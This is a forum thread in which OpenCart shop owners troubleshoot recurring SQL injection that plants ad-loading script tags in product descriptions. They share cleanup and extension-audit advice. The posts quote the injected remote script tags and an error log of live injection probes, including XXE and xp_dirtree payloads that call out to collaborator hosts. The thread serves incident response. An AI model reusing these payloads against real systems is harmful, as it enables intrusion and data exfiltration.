Post by rhysjuk » Sun Apr 16, 2017 9:15 pm

I have a client running OC 2.3.0.2 and there seems to be a a SQL injection occurring on a daily basis.The Product & Category description seems to include the following code:

Code: Select all

<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script
I have regular backups of mysql and OC files at hand, so every time there's an injection I'm restoring both mysql and OC files to be on the safe side.
I'm pulling my hair out on this one, I've tried many security recommendations and followed the standard Opencart Security amendments but unfortunately the site is still being attacked.

Any advice is greatly appreciated :)

Thanks
Rhys

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by HAO » Sun Apr 16, 2017 11:24 pm

I hope OpenCart official can face this problem.

Because today, I received two customer response, Said they were successfully scammered by Fraud group.

This is already a clear money loss of fraud, Fraud Group invades our system, Use the correct customer order data for fraud.

I hope you will be able to provide like with Joomla! Fixes for the same correction mode, Let us keep the most complete protection, not let us one by one to find Bug to fix.

This may result in the information security vulnerabilities for those of us who are not English-speaking countries of, Because we do not even know how to fix.

Please fix this problem and provide updated patch files let we download.

Like this:
https://downloads.joomla.org/cms/joomla3/3-6-5 Joomla! 3.6.x to 3.6.5 Patch Package (.zip)

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by ADD Creative » Mon Apr 17, 2017 6:10 am

If you haven't already change your passwords for all admin users.

Check your files on your server have not been modified by comparing against a clean download.

Look through your web server logs for anything suspicious.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by rhysjuk » Mon Apr 17, 2017 6:45 pm

ADD Creative wrote:
Mon Apr 17, 2017 6:10 am
If you haven't already change your passwords for all admin users.

Check your files on your server have not been modified by comparing against a clean download.

Look through your web server logs for anything suspicious.
Good advice, I replace the files so quickly to get the website functioning correctly I didn't analyse what site files were modified. I know for certain the product and category descriptions were modified because that's the only part I did analyse.
I've been investigating further and noticed this exploit, I'm wondering if it's the same but not sure how to overcome it.

https://www.exploit-db.com/exploits/39679/

Thanks again
Rhys

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by IP_CAM » Tue Apr 18, 2017 9:39 am

Did you really kill/delete/remove each entire Subdirectory, then, upload the
entire clean Subdirectory again, only containing, what should be there by default.
Or did you just overwrite the existing Subdirectory Content, without checking first,
if possibly additional files exist ? But this would not sufficient, to make sure.
Just an idea...
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by ADD Creative » Tue Apr 18, 2017 8:59 pm

rhysjuk wrote:
Mon Apr 17, 2017 6:45 pm
ADD Creative wrote:
Mon Apr 17, 2017 6:10 am
If you haven't already change your passwords for all admin users.

Check your files on your server have not been modified by comparing against a clean download.

Look through your web server logs for anything suspicious.
Good advice, I replace the files so quickly to get the website functioning correctly I didn't analyse what site files were modified. I know for certain the product and category descriptions were modified because that's the only part I did analyse.
I've been investigating further and noticed this exploit, I'm wondering if it's the same but not sure how to overcome it.

https://www.exploit-db.com/exploits/39679/

Thanks again
Rhys
That exploit only works if you do not have JSON installed on your server. So make sure JSON is installed. Do you currently have JSON support enabled? Check with phpinfo.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by HAO » Tue Apr 18, 2017 10:52 pm

IP_CAM wrote:
Tue Apr 18, 2017 9:39 am
Did you really kill/delete/remove each entire Subdirectory, then, upload the
entire clean Subdirectory again, only containing, what should be there by default.
Or did you just overwrite the existing Subdirectory Content, without checking first,
if possibly additional files exist ? But this would not sufficient, to make sure.
Just an idea...
Ernie
I have used Beyond Compare 2 to compare files, The original file has no obvious changes.

Most of the files, Are the changes made by themes or extensions, All the files compare not finished yet.

But my focus is, For us poor English ability of these users, I hope to be able to fix the way directly.

Like phpBB or Joomla!, The same way of updating, We just upload and replace the Patch Package, It can achieve a certain degree of security.

Even if the middle of the conflict should be able to compare it, There is even a manual update guide that allows us to follow the steps to modify it does not matter.

But according to the current situation, I do not know where to start.

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by ADD Creative » Wed Apr 19, 2017 2:05 am

What version of OpenCart are you currently using?

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by HAO » Wed Apr 19, 2017 12:09 pm

I am currently using OpenCart 2.1.0.2, I plan to upgrade to Version OpenCart 2.3.0.2.

But no matter which version, At present there is only a formal release of a version, In the middle of the bug need their own fix.

I would like to ask, Is my cognition correct?

if so, I believe codechanges and patch is a must, Because not everyone are strong English skills, It is difficult to fix each Bug.

codechanges and patch, Can do this.

This is what I want to say.

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by rhysjuk » Wed Apr 19, 2017 2:21 pm

IP_CAM wrote:
Tue Apr 18, 2017 9:39 am
Did you really kill/delete/remove each entire Subdirectory, then, upload the
entire clean Subdirectory again, only containing, what should be there by default.
Or did you just overwrite the existing Subdirectory Content, without checking first,
if possibly additional files exist ? But this would not sufficient, to make sure.
Just an idea...
Ernie
I backed up orders, products, categories, options, reviews, customers & addresses then wiped the entire files off ftp and copied over a fresh installation. I stripped all the dodgy code then restored to a fresh database. Once I knew everything was clean and correct, I made a complete snapshot of the database and site files. As the SQL injection happened on a daily occurrence I was reverting to the snapshot and then carried out differential restores. This got the site up and running within 20 minutes instead of 4 hours.
I have made some additional security changes, just waiting to see what happens - this is the longest time it's been since my clients site was breached.
Hopefully the additional security script has worked, will share when I know it works.

Thanks everyone, appreciate the support

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by rhysjuk » Wed Apr 19, 2017 2:29 pm

ADD Creative wrote:
Tue Apr 18, 2017 8:59 pm
rhysjuk wrote:
Mon Apr 17, 2017 6:45 pm
ADD Creative wrote:
Mon Apr 17, 2017 6:10 am
If you haven't already change your passwords for all admin users.

Check your files on your server have not been modified by comparing against a clean download.

Look through your web server logs for anything suspicious.
Good advice, I replace the files so quickly to get the website functioning correctly I didn't analyse what site files were modified. I know for certain the product and category descriptions were modified because that's the only part I did analyse.
I've been investigating further and noticed this exploit, I'm wondering if it's the same but not sure how to overcome it.

https://www.exploit-db.com/exploits/39679/

Thanks again
Rhys
That exploit only works if you do not have JSON installed on your server. So make sure JSON is installed. Do you currently have JSON support enabled? Check with phpinfo.
Good question, I checked and JSON support is enabled, v1.2.1
So this makes me wonder is this a new SQL injection and I've been unlucky to have a client who's been attacked.

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am

Post by ADD Creative » Wed Apr 19, 2017 7:26 pm

HAO wrote:
Wed Apr 19, 2017 12:09 pm
I am currently using OpenCart 2.1.0.2, I plan to upgrade to Version OpenCart 2.3.0.2.

But no matter which version, At present there is only a formal release of a version, In the middle of the bug need their own fix.

I would like to ask, Is my cognition correct?

if so, I believe codechanges and patch is a must, Because not everyone are strong English skills, It is difficult to fix each Bug.

codechanges and patch, Can do this.

This is what I want to say.
Sadly, you are correct. There are no easy to apply patches for older versions. You are expected to upgrade to the latest version. This can be difficult as any themes, extension and modifications need updating too.

Upgrading to 2.3.0.2 is also harder as the directory structure for extensions was changed.

I would recommend that you make a copy of your site and database at a new location and work out what needs to be done and fixed before upgrading your actual site.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by HAO » Wed Apr 19, 2017 8:12 pm

My idea is to release a version, Usually in a chaotic state.

On the current official release of 2.3.0.2, There are already a lot of people who report bugs and Fix.

So what happens in the 2.3.0.2 version of the calculation? Is not no need to patch?

If still count 2.3.0.2 Bug, Codechanges and patch is still needed.

In any case there is no such thing, I have a lot of experience that many modules do not support 2.3.0.2 (From GitHub 2.3.0.3 RC)

Because the architecture of the installation module is different.

As for the new version of the environment, I may have to be more time to deal with.

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by HAO » Wed Apr 19, 2017 10:55 pm

I found something like this for OpenCart 2.1.0.2.

https://randemsystems.com/support/openc ... 9/#msg6199

I am trying to upload the modified file, But it seems to have an impact on my style.

May I have to manually fix the above as I do fix?

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by HAO » Fri Apr 21, 2017 6:00 pm

I have just confirmed, I was also attacked by SQL injection.

The cause of the attack is a loophole in the module, The hacker seems to be using the module to steal data.

Code: Select all

2017-04-10 19:22:56 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&lt;x5s75'' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639}}r5q2m'/&quot;&lt;x5s75' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:56 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&lt;ha5y9'' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639%}na043'/&quot;&lt;ha5y9' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:56 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:57 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '&quot;&lt;khv03'' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639tjkob%&gt;es6w6'/&quot;&lt;khv03' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:57 - PHP Notice:  Error: FUNCTION tyleetw_shop.xmltype does not exist<br />Error No: 1305<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639'||(select extractvalue(xmltype('&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;!DOCTYPE root [ &lt;!ENTITY % mvrln SYSTEM &quot;http://8hqser7xxp5qdnz81ir8ibq35ubkzonga7yw.burpcollab'||'orator.net/&quot;&gt;%mvrln;]&gt;'),'/l') from dual)||'' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:57 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:58 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\n1p7y6rch4p5x2jnlxbn2qaip9vzjq9e11sph.burpcollab'+'orator.net\cvc'; exec maste' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639;declare @q varchar(99);set @q='\\n1p7y6rch4p5x2jnlxbn2qaip9vzjq9e11sph.burpcollab'+'orator.net\cvc'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:58 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'declare @q varchar(99);set @q='\\x97h6gzmpexf5crxt7jxa0isxj39r0ioab1zq.burpcolla' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639';declare @q varchar(99);set @q='\\x97h6gzmpexf5crxt7jxa0isxj39r0ioab1zq.burpcollab'+'orator.net\mck'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:58 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\nof7l6ec44c5k26n8xynpqxic9iz6qyeq1hp6.burpcollab'+'orator.net\lrd'; exec maste' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639);declare @q varchar(99);set @q='\\nof7l6ec44c5k26n8xynpqxic9iz6qyeq1hp6.burpcollab'+'orator.net\lrd'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:58 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:59 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ');declare @q varchar(99);set @q='\\qoial9ef47c8k56q80yqptxlcci26tzhr4is7.burpcol' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639');declare @q varchar(99);set @q='\\qoial9ef47c8k56q80yqptxlcci26tzhr4is7.burpcollab'+'orator.net\zrz'; exec master.dbo.xp_dirtree @q;-- ' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:22:59 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:59 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:22:59 - PHP Notice:  Undefined index: quantity in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:22:59 - PHP Notice:  Undefined index: stock_status_id in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383
2017-04-10 19:23:00 - PHP Notice:  Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''4639''' at line 1<br />Error No: 1064<br />SELECT quantity,stock_status_id from oc_product where product_id = '4639'' in /home/tyleetw/public_html/system/library/db/mysqli.php on line 41
2017-04-10 19:23:00 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 382
2017-04-10 19:23:00 - PHP Notice:  Trying to get property of non-object in /home/tyleetw/public_html/vqmod/vqcache/vq2-catalog_controller_checkout_cart.php on line 383

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by ADD Creative » Fri Apr 21, 2017 8:40 pm

Definitely looks like you have some vulnerable extensions.

The line below is definitely a from an extension.
SELECT quantity,stock_status_id from oc_product where product_id = '4639}}r5q2m'/&quot;&lt;x5s75'
It's clear from this that product_id is not being cast to an int to prevent injection.

I've seen a couple of sites compromised due to vulnerable extensions.

It's best if you go through all the SQL queries in all extensions to check that all variables used are escaped is some way.

I use the following regular expression search in a text editor to help with this. But it's not perfect.
=[\s]*'"[^\w]*(?<!\(int\))\$(?!(this->db->escape|db->escape))[\w]+

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by HAO » Fri Apr 21, 2017 9:42 pm

I have asked the developer to handle it.

In fact, when I bought the expansion of, We have encountered the same problem, It looks like he did not fix it.

Because he said that I might be wrong, But the same problem has been happening, So if we disable this extension on behalf of 2.1.0.2 is safe?

HAO
Active Member

Posts

Joined
Fri Jun 03, 2011 2:52 pm

Post by sims » Fri Apr 21, 2017 11:52 pm

Can I ask which extension is vulnerable

I have had exactly the same thing happen - advert code added to descritpion in 2 tables but am running Opencart 1.5.5.1

They did not gain login access and no files were altered in any way
Last edited by sims on Sat Apr 22, 2017 5:47 pm, edited 1 time in total.

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by rhysjuk » Sat Apr 22, 2017 2:14 am

Gentlemen, this is what I used and it's prevented the SQL injection so far, hope it works for you also.

viewtopic.php?t=115388

Thanks
Rhys

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am
Who is online

Users browsing this forum: No registered users and 24 guests